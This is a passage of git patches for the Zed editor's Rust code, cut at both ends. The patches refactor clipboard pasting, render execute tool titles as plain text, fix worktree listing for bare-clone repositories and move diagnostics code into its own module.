return; + } + + cx.stop_propagation(); + self.paste_item(&clipboard, window, cx); + } + + pub fn paste_item( + &mut self, + clipboard: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) { let Some(workspace) = self.workspace.upgrade() else { return; }; - let editor_clipboard_selections = cx.read_from_clipboard().and_then(|item| { - item.entries().iter().find_map(|entry| match entry { + let editor_clipboard_selections = + clipboard.entries().iter().find_map(|entry| match entry { ClipboardEntry::String(text) => { text.metadata_json::>() } _ => None, - }) - }); + }); // Insert creases for pasted clipboard selections that: // 1. Contain exactly one selection @@ -997,7 +1032,6 @@ impl MessageEditor { .unwrap_or(false); if should_insert_creases && let Some(selections) = editor_clipboard_selections { - cx.stop_propagation(); let snapshot = self.editor.read(cx).buffer().read(cx).snapshot(cx); let (insertion_target, _) = snapshot .anchor_to_buffer_anchor(self.editor.read(cx).selections.newest_anchor().start) @@ -1085,14 +1119,12 @@ impl MessageEditor { } // Handle text paste with potential markdown mention links before // clipboard context entries so markdown text still pastes as text. 
- if let Some(clipboard_text) = cx.read_from_clipboard().and_then(|item| { - item.entries().iter().find_map(|entry| match entry { - ClipboardEntry::String(text) => Some(text.text().to_string()), - _ => None, - }) - }) { + let clipboard_text = clipboard.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(text) => Some(text.text().to_string()), + _ => None, + }); + if let Some(clipboard_text) = clipboard_text.as_deref() { if clipboard_text.contains("[@") { - cx.stop_propagation(); let selections_before = self.editor.update(cx, |editor, cx| { let snapshot = editor.buffer().read(cx).snapshot(cx); editor @@ -1109,7 +1141,7 @@ impl MessageEditor { }); self.editor.update(cx, |editor, cx| { - editor.insert(&clipboard_text, window, cx); + editor.insert(clipboard_text, window, cx); }); let snapshot = self.editor.read(cx).buffer().read(cx).snapshot(cx); @@ -1180,12 +1212,13 @@ impl MessageEditor { } } - if self.handle_pasted_context(window, cx) { + if self.handle_pasted_context(clipboard, window, cx) { return; } - // Fall through to default editor paste - cx.propagate(); + self.editor.update(cx, |editor, cx| { + editor.paste_item(clipboard, window, cx); + }); } fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context) { @@ -1205,11 +1238,12 @@ impl MessageEditor { }); } - fn handle_pasted_context(&mut self, window: &mut Window, cx: &mut Context) -> bool { - let Some(clipboard) = cx.read_from_clipboard() else { - return false; - }; - + fn handle_pasted_context( + &mut self, + clipboard: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) -> bool { if matches!( clipboard.entries().first(), Some(ClipboardEntry::String(_)) | None @@ -1229,9 +1263,7 @@ impl MessageEditor { let editor = self.editor.clone(); let mention_set = self.mention_set.clone(); let workspace = self.workspace.clone(); - let entries = clipboard.into_entries().collect::>(); - - cx.stop_propagation(); + let entries = clipboard.clone().into_entries().collect::>(); window 
.spawn(cx, async move |mut cx| { diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index d9dd6078c08953..a57b705856040b 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -14756,24 +14756,33 @@ impl Editor { } pub fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context) { + if let Some(item) = cx.read_from_clipboard() { + self.paste_item(&item, window, cx); + } + } + + pub fn paste_item( + &mut self, + item: &ClipboardItem, + window: &mut Window, + cx: &mut Context, + ) { if self.read_only(cx) { return; } - if let Some(item) = cx.read_from_clipboard() { - let clipboard_string = item.entries().iter().find_map(|entry| match entry { - ClipboardEntry::String(s) => Some(s), - _ => None, - }); - match clipboard_string { - Some(clipboard_string) => self.do_paste( - clipboard_string.text(), - clipboard_string.metadata_json::>(), - true, - window, - cx, - ), - _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), - } + let clipboard_string = item.entries().iter().find_map(|entry| match entry { + ClipboardEntry::String(s) => Some(s), + _ => None, + }); + match clipboard_string { + Some(clipboard_string) => self.do_paste( + clipboard_string.text(), + clipboard_string.metadata_json::>(), + true, + window, + cx, + ), + _ => self.do_paste(&item.text().unwrap_or_default(), None, true, window, cx), } } From 95d8ca38028562110d400e130b445678219cb550 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 17:11:11 +0200 Subject: [PATCH 200/231] acp_thread: Render execute tool titles as plain text (#55783) We had a regression where the labels were being rendered as markdown, which is usually not what you want on a command Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX 
checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/acp_thread/src/acp_thread.rs | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/crates/acp_thread/src/acp_thread.rs b/crates/acp_thread/src/acp_thread.rs index a18f9f21e79b54..2c448d343075b6 100644 --- a/crates/acp_thread/src/acp_thread.rs +++ b/crates/acp_thread/src/acp_thread.rs @@ -299,10 +299,15 @@ impl ToolCall { let subagent_session_info = subagent_session_info_from_meta(&tool_call.meta); + let label = if tool_call.kind == acp::ToolKind::Execute { + cx.new(|cx| Markdown::new_text(title.into(), cx)) + } else { + cx.new(|cx| Markdown::new(title.into(), Some(language_registry.clone()), None, cx)) + }; + let result = Self { id: tool_call.tool_call_id, - label: cx - .new(|cx| Markdown::new(title.into(), Some(language_registry.clone()), None, cx)), + label, kind: tool_call.kind, content, locations: tool_call.locations, From ef22513fe577010f008173a9b46a2f8444eae7c7 Mon Sep 17 00:00:00 2001 From: Om Chillure Date: Tue, 5 May 2026 21:04:56 +0530 Subject: [PATCH 201/231] Fix git worktree popup showing no worktrees when opened in a project (#55053) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ## Summary Fixes the `git: worktree` popup showing no worktrees when a project is opened at the parent of a `.bare` directory (the common bare-clone-with-sibling-worktrees layout). ## What's fixed - `crates/git/src/repository.rs` - New `git_binary_for_worktree_list` helper that uses `repository.path()` as the working directory when `workdir()` is `None`. - `worktrees()` switched to the new helper. - `parse_worktrees_from_str` accepts bare entries without a `HEAD` line. - Tests - Unit test: parser handles a bare entry with no `HEAD` followed by a normal worktree entry.
- Integration test: full `.git`-file → `.bare` + sibling worktrees layout (`main`, `feature-a`, `feature-b`) is listed correctly via the real `git` binary. UI rendering already gates on empty sha (`worktree_picker.rs` uses `.when(!sha.is_empty(), ...)`), so the bare entry's empty sha renders without artifacts. ## Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments — N/A, no `unsafe` - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable — same single `git worktree list --porcelain` invocation, no extra work #### Closes #54824 Video [Screencast from 2026-04-28 09-43-45.webm](https://github.com/user-attachments/assets/e414d546-eb61-4cb2-857e-3c392f416f96) Release Notes: - Fixed the `git: worktree` popup listing no worktrees when a project was opened at the parent of a `.bare` directory (bare-clone-with-sibling-worktrees layout). 
--------- Co-authored-by: Max Brunsfeld --- crates/git/src/repository.rs | 142 +++++++++++++++++------------------ 1 file changed, 68 insertions(+), 74 deletions(-) diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index d98e917d69ce59..90ac06d959a1fa 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -27,7 +27,6 @@ use std::process::ExitStatus; use std::str::FromStr; use std::{ cmp::Ordering, - future, path::{Path, PathBuf}, sync::Arc, }; @@ -1089,7 +1088,7 @@ impl RealGitRepository { .map(Path::to_path_buf) } - fn git_binary(&self) -> Result { + fn git_binary_in_worktree(&self) -> Result { Ok(GitBinary::new( self.any_git_binary_path.clone(), self.working_directory() @@ -1100,12 +1099,27 @@ impl RealGitRepository { )) } + fn git_binary(&self) -> GitBinary { + let repository = self.repository.lock(); + let working_directory = repository + .workdir() + .unwrap_or_else(|| repository.path()) + .to_path_buf(); + GitBinary::new( + self.any_git_binary_path.clone(), + working_directory, + repository.path().to_path_buf(), + self.executor.clone(), + self.is_trusted(), + ) + } + fn edit_ref(&self, edit: RefEdit) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let args = edit.into_args(); - git_binary?.run(&args).await?; + git.run(&args).await?; Ok(()) }) .boxed() @@ -1115,10 +1129,10 @@ impl RealGitRepository { if let Some(output) = self.any_git_binary_help_output.lock().clone() { return output; } - let git_binary = self.git_binary(); + let git = self.git_binary(); let output: SharedString = self .executor - .spawn(async move { git_binary?.run(&["help", "-a"]).await }) + .spawn(async move { git.run(&["help", "-a"]).await }) .await .unwrap_or_default() .into(); @@ -1202,10 +1216,9 @@ impl GitRepository for RealGitRepository { } fn show(&self, commit: String) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git = 
self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&[ "show", @@ -1237,12 +1250,8 @@ impl GitRepository for RealGitRepository { } fn load_commit(&self, commit: String, cx: AsyncApp) -> BoxFuture<'_, Result> { - if self.repository.lock().workdir().is_none() { - return future::ready(Err(anyhow!("no working directory"))).boxed(); - } - let git_binary = self.git_binary(); + let git = self.git_binary(); cx.background_spawn(async move { - let git = git_binary?; let show_output = git .build_command(&[ "show", @@ -1372,7 +1381,7 @@ impl GitRepository for RealGitRepository { mode: ResetMode, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); async move { let mode_flag = match mode { ResetMode::Mixed => "--mixed", @@ -1401,7 +1410,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); async move { if paths.is_empty() { return Ok(()); @@ -1557,10 +1566,9 @@ impl GitRepository for RealGitRepository { env: Arc>, is_executable: bool, ) -> BoxFuture<'_, anyhow::Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let mode = if is_executable { "100755" } else { "100644" }; if let Some(content) = content { @@ -1624,10 +1632,9 @@ impl GitRepository for RealGitRepository { } fn revparse_batch(&self, revs: Vec) -> BoxFuture<'_, Result>>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let mut process = git .build_command(&["cat-file", "--batch-check=%(objectname)"]) .stdin(Stdio::piped()) @@ -1678,7 +1685,7 @@ impl GitRepository for RealGitRepository { } fn status(&self, path_prefixes: &[RepoPath]) -> Task> { - let git = match self.git_binary() 
{ + let git = match self.git_binary_in_worktree() { Ok(git) => git, Err(e) => return Task::ready(Err(e)), }; @@ -1697,7 +1704,7 @@ impl GitRepository for RealGitRepository { } fn diff_tree(&self, request: DiffTreeType) -> BoxFuture<'_, Result> { - let git = match self.git_binary() { + let git = match self.git_binary_in_worktree() { Ok(git) => git, Err(e) => return Task::ready(Err(e)).boxed(), }; @@ -1735,7 +1742,7 @@ impl GitRepository for RealGitRepository { } fn stash_entries(&self) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -1755,7 +1762,7 @@ impl GitRepository for RealGitRepository { } fn branches(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let fields = [ @@ -1777,7 +1784,6 @@ impl GitRepository for RealGitRepository { "--format", &fields, ]; - let git = git_binary?; let output = git.build_command(&args).output().await?; anyhow::ensure!( @@ -1814,7 +1820,7 @@ impl GitRepository for RealGitRepository { } fn worktrees(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); let main_worktree_path = { let repo = self.repository.lock(); let common_dir = repo.commondir().to_path_buf(); @@ -1822,7 +1828,6 @@ impl GitRepository for RealGitRepository { }; self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["worktree", "list", "--porcelain"]) .output() @@ -1846,7 +1851,7 @@ impl GitRepository for RealGitRepository { target: CreateWorktreeTarget, path: PathBuf, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); let mut args = vec![OsString::from("worktree"), OsString::from("add")]; match &target { @@ -1878,7 +1883,6 @@ impl GitRepository for RealGitRepository { self.executor .spawn(async move { 
std::fs::create_dir_all(path.parent().unwrap_or(&path))?; - let git = git_binary?; let output = git.build_command(&args).output().await?; if output.status.success() { Ok(()) @@ -1891,7 +1895,7 @@ impl GitRepository for RealGitRepository { } fn remove_worktree(&self, path: PathBuf, force: bool) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { @@ -1901,14 +1905,14 @@ impl GitRepository for RealGitRepository { } args.push("--".into()); args.push(path.as_os_str().into()); - git_binary?.run(&args).await?; + git.run(&args).await?; anyhow::Ok(()) }) .boxed() } fn rename_worktree(&self, old_path: PathBuf, new_path: PathBuf) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { @@ -1919,7 +1923,7 @@ impl GitRepository for RealGitRepository { old_path.as_os_str().into(), new_path.as_os_str().into(), ]; - git_binary?.run(&args).await?; + git.run(&args).await?; anyhow::Ok(()) }) .boxed() @@ -1953,7 +1957,7 @@ impl GitRepository for RealGitRepository { fn change_branch(&self, name: String) -> BoxFuture<'_, Result<()>> { let repo = self.repository.clone(); - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let branch = self.executor.spawn(async move { let repo = repo.lock(); let branch = if let Ok(branch) = repo.find_branch(&name, BranchType::Local) { @@ -1999,7 +2003,7 @@ impl GitRepository for RealGitRepository { name: String, base_branch: Option, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2017,7 +2021,7 @@ impl GitRepository for RealGitRepository { } fn rename_branch(&self, branch: String, new_name: String) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ 
-2030,7 +2034,7 @@ impl GitRepository for RealGitRepository { } fn delete_branch(&self, is_remote: bool, name: String) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2048,7 +2052,7 @@ impl GitRepository for RealGitRepository { content: Rope, line_ending: LineEnding, ) -> BoxFuture<'_, Result> { - let git = self.git_binary(); + let git = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2058,7 +2062,7 @@ impl GitRepository for RealGitRepository { } fn diff(&self, diff: DiffType) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2089,7 +2093,7 @@ impl GitRepository for RealGitRepository { path_prefixes: &[RepoPath], ) -> BoxFuture<'_, Result> { let path_prefixes = path_prefixes.to_vec(); - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2119,7 +2123,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { if !paths.is_empty() { @@ -2146,7 +2150,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { @@ -2175,7 +2179,7 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2201,7 +2205,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = 
self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2226,7 +2230,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2251,7 +2255,7 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2279,7 +2283,7 @@ impl GitRepository for RealGitRepository { ask_pass: AskPassDelegate, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let executor = self.executor.clone(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. @@ -2325,11 +2329,11 @@ impl GitRepository for RealGitRepository { } fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { let args: Vec = vec!["worktree".into(), "repair".into()]; - git_binary?.run(&args).await?; + git.run(&args).await?; Ok(()) }) .boxed() @@ -2431,7 +2435,7 @@ impl GitRepository for RealGitRepository { env: Arc>, cx: AsyncApp, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); + let working_directory = self.working_directory().unwrap_or(self.path()); let git_directory = self.path(); let remote_name = format!("{}", fetch_options); let git_binary_path = self.system_git_binary_path.clone(); @@ -2441,7 +2445,6 @@ impl GitRepository for RealGitRepository { // which we want to block on. 
async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't fetch")?; - let working_directory = working_directory?; let git = GitBinary::new( git_binary_path, working_directory, @@ -2461,10 +2464,9 @@ impl GitRepository for RealGitRepository { } fn get_push_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["rev-parse", "--abbrev-ref"]) .arg(format!("{branch}@{{push}}")) @@ -2486,10 +2488,9 @@ impl GitRepository for RealGitRepository { } fn get_branch_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git .build_command(&["config", "--get"]) .arg(format!("branch.{branch}.remote")) @@ -2508,10 +2509,9 @@ impl GitRepository for RealGitRepository { } fn get_all_remotes(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; let output = git.build_command(&["remote", "-v"]).output().await?; anyhow::ensure!( @@ -2561,7 +2561,7 @@ impl GitRepository for RealGitRepository { } fn check_for_pushed_commit(&self) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2615,7 +2615,7 @@ impl GitRepository for RealGitRepository { } fn checkpoint(&self) -> BoxFuture<'static, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let mut git = git_binary?.envs(checkpoint_author_envs()); @@ -2644,7 +2644,7 @@ impl GitRepository for RealGitRepository { } fn restore_checkpoint(&self, checkpoint: GitRepositoryCheckpoint) -> BoxFuture<'_, 
Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2674,7 +2674,7 @@ impl GitRepository for RealGitRepository { } fn create_archive_checkpoint(&self) -> BoxFuture<'_, Result<(String, String)>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let mut git = git_binary?.envs(checkpoint_author_envs()); @@ -2732,7 +2732,7 @@ impl GitRepository for RealGitRepository { staged_sha: String, unstaged_sha: String, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2762,7 +2762,7 @@ impl GitRepository for RealGitRepository { left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2796,7 +2796,7 @@ impl GitRepository for RealGitRepository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); self.executor .spawn(async move { let git = git_binary?; @@ -2816,11 +2816,9 @@ impl GitRepository for RealGitRepository { &self, include_remote_name: bool, ) -> BoxFuture<'_, Result>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); self.executor .spawn(async move { - let git = git_binary?; - let strip_prefix = if include_remote_name { "refs/remotes/" } else { @@ -2869,7 +2867,7 @@ impl GitRepository for RealGitRepository { hook: RunHook, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git_binary = self.git_binary_in_worktree(); let repository = self.repository.clone(); let help_output = 
self.any_git_binary_help_output(); @@ -2922,11 +2920,9 @@ impl GitRepository for RealGitRepository { log_order: LogOrder, request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); async move { - let git = git_binary?; - let mut git_log_command = vec![ "log", GRAPH_COMMIT_FORMAT, @@ -3004,11 +3000,9 @@ impl GitRepository for RealGitRepository { search_args: SearchCommitArgs, request_tx: Sender, ) -> BoxFuture<'_, Result<()>> { - let git_binary = self.git_binary(); + let git = self.git_binary(); async move { - let git = git_binary?; - let mut args = vec!["log", SEARCH_COMMIT_FORMAT, log_source.get_arg()?]; args.push("--fixed-strings"); @@ -3058,7 +3052,7 @@ impl GitRepository for RealGitRepository { } fn commit_data_reader(&self) -> Result { - let git_binary = self.git_binary()?; + let git_binary = self.git_binary(); let (request_tx, request_rx) = async_channel::bounded::(64); From 013646188f72306672ca5c099742c41509e28cb2 Mon Sep 17 00:00:00 2001 From: Mikhail Pertsev Date: Tue, 5 May 2026 17:52:45 +0200 Subject: [PATCH 202/231] editor: Extract Diagnostics code out of `editor.rs` (#55747) cc @SomeoneToIgnore ## Summary Follow-up to https://github.com/zed-industries/zed/discussions/55352, where the conclusion was to split `editor.rs` incrementally by topic instead of all at once. This mechanically extracts diagnostics-related editor code into `crates/editor/src/editor/diagnostics.rs` while preserving the existing public API via re-exports. 
## Testing - `cargo check -p editor --lib` - `cargo check -p diagnostics --lib` - `cargo check -p diagnostics --tests` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/diagnostics/src/diagnostics_tests.rs | 8 +- crates/editor/src/display_map.rs | 16 +- crates/editor/src/editor.rs | 513 +------------------ crates/editor/src/editor/diagnostics.rs | 519 ++++++++++++++++++++ crates/editor/src/element.rs | 21 +- crates/editor/src/hover_popover.rs | 12 +- 6 files changed, 553 insertions(+), 536 deletions(-) create mode 100644 crates/editor/src/editor/diagnostics.rs diff --git a/crates/diagnostics/src/diagnostics_tests.rs b/crates/diagnostics/src/diagnostics_tests.rs index 527f5b5bfcbfa2..c587e61c4f470a 100644 --- a/crates/diagnostics/src/diagnostics_tests.rs +++ b/crates/diagnostics/src/diagnostics_tests.rs @@ -1037,9 +1037,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) cx.update_editor(|editor, window, cx| { editor.go_to_diagnostic(&GoToDiagnostic::default(), window, cx); assert_eq!( - editor - .active_diagnostic_group() - .map(|diagnostics_group| diagnostics_group.active_message.as_str()), + editor.active_diagnostic_message(), Some(message), "Should have a diagnostics group activated" ); @@ -1069,7 +1067,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) }); cx.run_until_parked(); cx.update_editor(|editor, _, _| { - assert_eq!(editor.active_diagnostic_group(), None); + assert_eq!(editor.active_diagnostic_message(), None); }); cx.assert_editor_state(indoc! 
{" fn func(abcˇ def: i32) -> u32 { @@ -1078,7 +1076,7 @@ async fn active_diagnostics_dismiss_after_invalidation(cx: &mut TestAppContext) cx.update_editor(|editor, window, cx| { editor.go_to_diagnostic(&GoToDiagnostic::default(), window, cx); - assert_eq!(editor.active_diagnostic_group(), None); + assert_eq!(editor.active_diagnostic_message(), None); }); cx.assert_editor_state(indoc! {" fn func(abcˇ def: i32) -> u32 { diff --git a/crates/editor/src/display_map.rs b/crates/editor/src/display_map.rs index 552eca261e9786..db01bbb178694f 100644 --- a/crates/editor/src/display_map.rs +++ b/crates/editor/src/display_map.rs @@ -94,7 +94,7 @@ pub use wrap_map::{WrapPoint, WrapRow, WrapSnapshot}; use collections::{HashMap, HashSet, IndexSet}; use gpui::{ - App, Context, Entity, EntityId, Font, HighlightStyle, LineLayout, Pixels, UnderlineStyle, + App, Context, Entity, EntityId, Font, HighlightStyle, Hsla, LineLayout, Pixels, UnderlineStyle, WeakEntity, }; use language::{ @@ -113,6 +113,7 @@ use settings::Settings; use smallvec::SmallVec; use sum_tree::{Bias, TreeMap}; use text::{BufferId, LineIndent, Patch}; +use theme::StatusColors; use ui::{SharedString, px}; use unicode_segmentation::UnicodeSegmentation; use ztracing::instrument; @@ -1848,8 +1849,7 @@ impl DisplaySnapshot { && editor_style.show_underlines && !(chunk.is_unnecessary && severity > lsp::DiagnosticSeverity::WARNING)) .then(|| { - let diagnostic_color = - super::diagnostic_style(severity, &editor_style.status); + let diagnostic_color = diagnostic_style(severity, &editor_style.status); UnderlineStyle { color: Some(diagnostic_color), thickness: 1.0.into(), @@ -2414,6 +2414,16 @@ impl DisplaySnapshot { } } +fn diagnostic_style(severity: lsp::DiagnosticSeverity, colors: &StatusColors) -> Hsla { + match severity { + lsp::DiagnosticSeverity::ERROR => colors.error, + lsp::DiagnosticSeverity::WARNING => colors.warning, + lsp::DiagnosticSeverity::INFORMATION => colors.info, + lsp::DiagnosticSeverity::HINT => 
colors.hint, + _ => colors.ignored, + } +} + impl std::ops::Deref for DisplaySnapshot { type Target = BlockSnapshot; diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index a57b705856040b..649ffbfae8aa8f 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -57,7 +57,12 @@ mod signature_help; #[cfg(any(test, feature = "test-support"))] pub mod test; +#[path = "editor/diagnostics.rs"] +mod diagnostics; + pub(crate) use actions::*; +use diagnostics::{ActiveDiagnostic, GlobalDiagnosticRenderer, InlineDiagnostic}; +pub use diagnostics::{DiagnosticRenderer, set_diagnostic_renderer}; pub use display_map::{ ChunkRenderer, ChunkRendererContext, DisplayPoint, FoldPlaceholder, HighlightKey, NavigationOverlayKey, SemanticTokenHighlight, @@ -390,48 +395,6 @@ pub fn set_blame_renderer(renderer: impl BlameRenderer + 'static, cx: &mut App) cx.set_global(GlobalBlameRenderer(Arc::new(renderer))); } -pub trait DiagnosticRenderer { - fn render_group( - &self, - diagnostic_group: Vec>, - buffer_id: BufferId, - snapshot: EditorSnapshot, - editor: WeakEntity, - language_registry: Option>, - cx: &mut App, - ) -> Vec>; - - fn render_hover( - &self, - diagnostic_group: Vec>, - range: Range, - buffer_id: BufferId, - language_registry: Option>, - cx: &mut App, - ) -> Option>; - - fn open_link( - &self, - editor: &mut Editor, - link: SharedString, - window: &mut Window, - cx: &mut Context, - ); -} - -pub(crate) struct GlobalDiagnosticRenderer(pub Arc); - -impl GlobalDiagnosticRenderer { - fn global(cx: &App) -> Option> { - cx.try_global::().map(|g| g.0.clone()) - } -} - -impl gpui::Global for GlobalDiagnosticRenderer {} -pub fn set_diagnostic_renderer(renderer: impl DiagnosticRenderer + 'static, cx: &mut App) { - cx.set_global(GlobalDiagnosticRenderer(Arc::new(renderer))); -} - pub struct SearchWithinRange; trait InvalidationRegion { @@ -678,15 +641,6 @@ enum EditPredictionSettings { }, } -#[derive(Debug, Clone)] -struct InlineDiagnostic { - 
message: SharedString, - group_id: usize, - is_primary: bool, - start: Point, - severity: lsp::DiagnosticSeverity, -} - pub enum MenuEditPredictionsPolicy { Never, ByProvider, @@ -1771,22 +1725,6 @@ struct RegisteredEditPredictionDelegate { _subscription: Subscription, } -#[derive(Debug, PartialEq, Eq)] -pub struct ActiveDiagnosticGroup { - pub active_range: Range, - pub active_message: String, - pub group_id: usize, - pub blocks: HashSet, -} - -#[derive(Debug, PartialEq, Eq)] - -pub(crate) enum ActiveDiagnostic { - None, - All, - Group(ActiveDiagnosticGroup), -} - #[derive(Serialize, Deserialize, Clone, Debug)] pub struct ClipboardSelection { /// The number of bytes in this selection. @@ -4713,7 +4651,7 @@ impl Editor { dismissed = true; } - if self.mode.is_full() && matches!(self.active_diagnostics, ActiveDiagnostic::Group(_)) { + if self.mode.is_full() && self.has_active_diagnostic_group() { self.dismiss_diagnostics(cx); dismissed = true; } @@ -18249,123 +18187,6 @@ impl Editor { ); } - pub fn go_to_diagnostic( - &mut self, - action: &GoToDiagnostic, - window: &mut Window, - cx: &mut Context, - ) { - if !self.diagnostics_enabled() { - return; - } - self.go_to_diagnostic_impl(Direction::Next, 